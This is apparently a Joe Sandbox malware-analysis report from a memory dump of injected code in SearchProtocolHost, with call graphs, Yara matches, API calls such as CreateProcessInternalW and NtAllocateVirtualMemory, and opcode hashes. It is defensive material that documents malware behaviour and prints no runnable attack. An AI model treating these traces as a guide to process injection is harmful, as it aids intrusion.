100052 1225cb 100052->100045 100054 1397e2 100053->100054 100056 13977e 100053->100056 100058 b62e80 LdrInitializeThunk 100054->100058 100055 139813 100055->100052 100056->100052 100058->100055 100064 130320 100065 13033d 100064->100065 100066 124820 LdrLoadDll 100065->100066 100067 13035b 100066->100067 100068 131960 100069 13197c 100068->100069 100070 1319a4 100069->100070 100071 1319b8 100069->100071 100073 1396b0 NtClose 100070->100073 100072 1396b0 NtClose 100071->100072 100074 1319c1 100072->100074 100075 1319ad 100073->100075 100078 13b890 RtlAllocateHeap 100074->100078 100077 1319cc 100078->100077 100079 1393a0 100080 13945a 100079->100080 100082 1393d2 100079->100082 100081 139470 NtCreateFile 100080->100081 100083 1359a0 100084 135a01 100083->100084 100086 135a0e 100084->100086 100087 127660 100084->100087 100088 12766e 100087->100088 100089 12760f 100087->100089 100088->100086 100090 127652 100089->100090 100092 12b500 100089->100092 100090->100086 100093 12b526 100092->100093 100094 12b749 100093->100094 100095 12b598 100093->100095 100119 139ac0 100093->100119 100094->100090 100095->100094 100097 13c940 2 API calls 100095->100097 100098 12b5b7 100097->100098 100098->100094 100099 12b688 100098->100099 100100 138cc0 LdrInitializeThunk 100098->100100 100101 125e00 LdrInitializeThunk 100099->100101 100104 12b6a4 100099->100104 100102 12b619 100100->100102 100101->100104 100102->100099 100103 12b622 100102->100103 100103->100094 100106 12b651 100103->100106 100114 12b670 100103->100114 100122 125e00 100103->100122 100118 12b731 100104->100118 100126 138830 100104->100126 100105 1283b0 LdrInitializeThunk 100108 12b67e 100105->100108 100141 134940 LdrInitializeThunk 100106->100141 100107 1283b0 LdrInitializeThunk 100112 12b73f 100107->100112 100108->100090 100112->100090 100113 12b708 100131 1388e0 100113->100131 100114->100105 100116 12b722 100136 138a40 100116->100136 100118->100107 100120 139add 100119->100120 100121 139aee CreateProcessInternalW 100120->100121 100121->100095 100123 125e15 100122->100123 100124 138e90 LdrInitializeThunk 100123->100124 100125 125e3e 100124->100125 100125->100106 100127 1388ad 100126->100127 100129 13885b 100126->100129 100142 b639b0 LdrInitializeThunk 100127->100142 100128 1388d2 100128->100113 100129->100113 100132 13890e 100131->100132 100133 138960 100131->100133 100132->100116 100143 b64340 LdrInitializeThunk 100133->100143 100134 138985 100134->100116 100137 138abd 100136->100137 100138 138a6b 100136->100138 100144 b62fb0 LdrInitializeThunk 100137->100144 100138->100118 100139 138ae2 100139->100118 100141->100114 100142->100128 100143->100134 100144->100139

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00119EA0 Relevance: 36.7, Strings: 29, Instructions: 463COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 27 119ea0-11a328 28 11a339-11a345 27->28 29 11a347-11a350 28->29 30 11a35d-11a36e 28->30 32 11a352-11a355 29->32 33 11a35b 29->33 31 11a37f-11a388 30->31 34 11a38a-11a39d 31->34 35 11a39f-11a3b0 31->35 32->33 33->28 34->31 38 11a3c1-11a3cd 35->38 39 11a3e3 38->39 40 11a3cf-11a3e1 38->40 42 11a3ea-11a3f3 39->42 40->38 43 11a775-11a77c 42->43 44 11a3f9-11a403 42->44 46 11a7b2-11a7b9 43->46 47 11a77e-11a789 43->47 45 11a414-11a420 44->45 48 11a433-11a43d 45->48 49 11a422-11a431 45->49 52 11a874-11a87e 46->52 53 11a7bf call 13b3d0 46->53 50 11a790-11a7b0 47->50 51 11a78b-11a78f 47->51 55 11a44e-11a45a 48->55 49->45 50->43 51->50 56 11a88f-11a89b 52->56 58 11a7c4-11a7ce 53->58 59 11a471-11a47b 55->59 60 11a45c-11a46f 55->60 61 11a8b1-11a8bb 56->61 62 11a89d-11a8af 56->62 63 11a7df-11a7eb 58->63 66 11a48c-11a498 59->66 60->55 62->56 67 11a801-11a80d 63->67 68 11a7ed-11a7ff 63->68 69 11a49a-11a4ad 66->69 70 11a4af-11a4b9 66->70 71 11a832-11a83c 67->71 72 11a80f-11a830 67->72 68->63 69->66 75 11a4bb-11a4d8 70->75 76 11a4da-11a4ed 70->76 77 11a84d-11a856 71->77 72->67 75->70 78 11a4fe-11a50a 76->78 77->52 81 11a858-11a864 77->81 79 11a51d-11a52c 78->79 80 11a50c-11a51b 78->80 83 11a672-11a67c 79->83 84 11a532-11a539 79->84 80->78 85 11a872 81->85 86 11a866-11a86c 81->86 89 11a6b4-11a6be 83->89 90 11a67e-11a698 83->90 87 11a570-11a574 84->87 88 11a53b-11a56e 84->88 85->77 86->85 92 11a576-11a59b 87->92 93 11a59d-11a5a7 87->93 88->84 96 11a6cf-11a6db 89->96 94 11a69a-11a69e 90->94 95 11a69f-11a6a1 90->95 92->87 97 11a5b8-11a5c4 93->97 94->95 98 11a6a3-11a6ac 95->98 99 11a6b2 95->99 100 11a6dd-11a6ec 96->100 101 11a6ee-11a6f8 96->101 104 11a5e2-11a5ec 97->104 105 11a5c6-11a5d2 97->105 98->99 99->83 100->96 102 11a709-11a715 101->102 106 11a717-11a720 102->106 107 11a72d-11a734 102->107 110 11a5fd-11a609 104->110 108 11a5e0 105->108 109 11a5d4-11a5da 105->109 111 11a722-11a728 106->111 112 11a72b 106->112 113 11a766-11a770 107->113 114 11a736-11a764 107->114 108->97 109->108 116 11a619-11a623 110->116 117 11a60b-11a617 110->117 111->112 112->102 113->42 114->107 118 11a626-11a62f 116->118 117->110 121 11a631-11a643 118->121 122 11a645-11a64c 118->122 121->118 123 11a66d 122->123 124 11a64e-11a66b 122->124 123->43 124->122
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                                                                                                                                                  • API String ID: 0-4081740624
                                                                                                                                                                                  • Opcode ID: 4770cfdd4fe84b6a5c7a66255bcdc31ee2603af34e21e3f0b0db8cd12cbd56df
                                                                                                                                                                                  • Instruction ID: 1d897fed03ae47d20039e9d962680187b5654c3e4f5df1e7678361a4887bffd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4770cfdd4fe84b6a5c7a66255bcdc31ee2603af34e21e3f0b0db8cd12cbd56df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 16426CB09062298BEB68CF44C894BDDBBB1BF45308F6081DAC54D7B281DBB55AC9CF51
                                                                                                                                                                                  Function 0012C860 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0012C938
                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0012C973
                                                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 0012C97E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                                  • Opcode ID: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                                                                                                                  • Instruction ID: f51e2db056cfcc89c9fe71cf702ca6fc7d97dd96fe1d7ddcad6693566f8f44b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2231B471900218BBDB20EF64DC85FEFB77CEF54745F144558BA44A7180EB70AA948BE1
                                                                                                                                                                                  Function 001393A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001394A1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                                                                                                                  • Instruction ID: 0185bf50a150e9f14100386205d9efe820255d23c30e51b0806a4dc798560085
                                                                                                                                                                                  • Opcode Fuzzy Hash: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                                                                                                                  • Instruction Fuzzy Hash: B431B5B5A01248AFCB14DF99D881EDFB7B9EF8C704F108219F919A7340D770A951CBA5
                                                                                                                                                                                  Function 00139510 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001395F9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                                                                                                                  • Instruction ID: ca7f6ca68a974c6ac041d66cc4a71a6911728a647bed279c26abc94f35968310
                                                                                                                                                                                  • Opcode Fuzzy Hash: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE31C6B5A00208AFDB14DF99D881EEFB7B9EF88714F108219FD18A7241D770A951CFA5
                                                                                                                                                                                  Function 00139820 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00122088,?,0013816F,00000000,00000004,00003000,?,?,?,?,?,0013816F,00122088,10458B0C,00122088,00000000), ref: 001398E8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                                                                                                                  • Instruction ID: 581e1027ca25bc650f528938449723fc3b461db869d0ecf337ae9718d3d88079
                                                                                                                                                                                  • Opcode Fuzzy Hash: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9212BB5A00249AFDB14DF98DC81EEFB7B9EF88704F008119FD58A7241D770A951CBA1
                                                                                                                                                                                  Function 00139610 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeleteFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4033686569-0
                                                                                                                                                                                  • Opcode ID: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                                                                                                                  • Instruction ID: af64f422faece477584c3c8d5af2a87c4d8d21a23b779336d7c3fcb2388f9e78
                                                                                                                                                                                  • Opcode Fuzzy Hash: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                                                                                                                  • Instruction Fuzzy Hash: 37119EB1600208BED720EBA5CC02FEBB76CDF94704F008109FA4867281E7717A51CBA2
                                                                                                                                                                                  Function 001396B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001396E4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction ID: 860d1afdd63dd04b208eca368c6ba3c960d2a07bb01d4206c0320013e77d593b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E08C362102047BC620FAAACC01FEBB76CEFC5B54F01452AFA48A7242D771B90187F1
                                                                                                                                                                                  Function 00B64340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: b31f53f3198de38dc7b39486861023f964537ff5e1b22a89f5db51044e53585a
                                                                                                                                                                                  • Instruction ID: 5119832e032e9171ad4fb87f45ff6db9a1735751465c2c07d63108dbe099a003
                                                                                                                                                                                  • Opcode Fuzzy Hash: b31f53f3198de38dc7b39486861023f964537ff5e1b22a89f5db51044e53585a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9090023264580012924071584888546404597E0301B55C072E0564559C8E148A565361
                                                                                                                                                                                  Function 00B64650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 5059b6a108641b29a708a0823d7ec354629feb67e7906dae44f48468d8d9d4a3
                                                                                                                                                                                  • Instruction ID: 7712bd51416eafba838479382d4e135af044e9a33736ab3c59eb54b5d8ae1162
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5059b6a108641b29a708a0823d7ec354629feb67e7906dae44f48468d8d9d4a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7790026264150042424071584808406604597E1301395C176A0694565C8A1889559269
                                                                                                                                                                                  Function 00B62AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 4009757d308b5a5eeb2e3d21f82a82dd1d841f2bda8288361a10b7d41ccec9eb
                                                                                                                                                                                  • Instruction ID: bb5c72b4d27cf9c9c15f29d6f8864efdfbe9ed2008f73cef54bad8a27f008315
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4009757d308b5a5eeb2e3d21f82a82dd1d841f2bda8288361a10b7d41ccec9eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F900226261400020245B558060850B048597D6351395C076F1556595CCA2189655321
                                                                                                                                                                                  Function 00B62AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: f3491393b91bb995fdcd250252dc909214dc9459ee3d5ba87f7ab0c4ba269ec2
                                                                                                                                                                                  • Instruction ID: 5eabc92935f99de89eb936e391cd69d78c2321c729e9df4636e740444ea848d4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f3491393b91bb995fdcd250252dc909214dc9459ee3d5ba87f7ab0c4ba269ec2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24900437351400030305F55C070C50700C7C7D5351355C073F1155555CDF31CD715131
                                                                                                                                                                                  Function 00B62BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: c06b5f87e41070421da8b3449fa3431049aada8525a92b3e05416f3a018c629b
                                                                                                                                                                                  • Instruction ID: 15efed6d8a3cd8cfcaab9c091bc2a97c18e45b5230a914a16daeeffb3bbd0713
                                                                                                                                                                                  • Opcode Fuzzy Hash: c06b5f87e41070421da8b3449fa3431049aada8525a92b3e05416f3a018c629b
                                                                                                                                                                                  • Instruction Fuzzy Hash: E790023264540802D25071584418746004587D0301F55C072A0164659D8B558B5576A1
                                                                                                                                                                                  Function 00B62BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 818a3a0ff149fab09f0e2238d65b96b3eb37182f405fb2de0dfba0ffddb87fd2
                                                                                                                                                                                  • Instruction ID: a16f07d2e6b5d5977df8fca5645c8e1eaaf6862450af64be3df3012cabd4bb18
                                                                                                                                                                                  • Opcode Fuzzy Hash: 818a3a0ff149fab09f0e2238d65b96b3eb37182f405fb2de0dfba0ffddb87fd2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D190023224140802D2807158440864A004587D1301F95C076A0165659DCE158B5977A1
                                                                                                                                                                                  Function 00B62BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: d0b7bc101e79939a8bf92abb193da8e6cd4fba85185634ef388b1519e8fe539c
                                                                                                                                                                                  • Instruction ID: bbc3f43efbec9e619f5d891642cb1828b69a66c6294ab779ef7d1270ecbfedc5
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0b7bc101e79939a8bf92abb193da8e6cd4fba85185634ef388b1519e8fe539c
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF90023224544842D24071584408A46005587D0305F55C072A01A4699D9A258E55B661
                                                                                                                                                                                  Function 00B62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 36a68c7e37a4fedd2de7c9757a662449e753a4156393ba26c94f69659e417cf8
                                                                                                                                                                                  • Instruction ID: f6947e21b99ecb1f45676be8f72533b032db1dda20f5f33810e245dac09cf018
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36a68c7e37a4fedd2de7c9757a662449e753a4156393ba26c94f69659e417cf8
                                                                                                                                                                                  • Instruction Fuzzy Hash: B290026224240003420571584418616404A87E0301B55C072E1154595DC92589916125
                                                                                                                                                                                  Function 00B62CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 2d83b3683d807a77f23a9cabc771d685399a437466a7017c45d6bbc5f9deb9f8
                                                                                                                                                                                  • Instruction ID: 2998d5b6f1ca023e2c09f6d457b623db2db1a506549de4a25a311da6ec5d88ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d83b3683d807a77f23a9cabc771d685399a437466a7017c45d6bbc5f9deb9f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC90023224140402D2007598540C646004587E0301F55D072A516455AECA6589916131
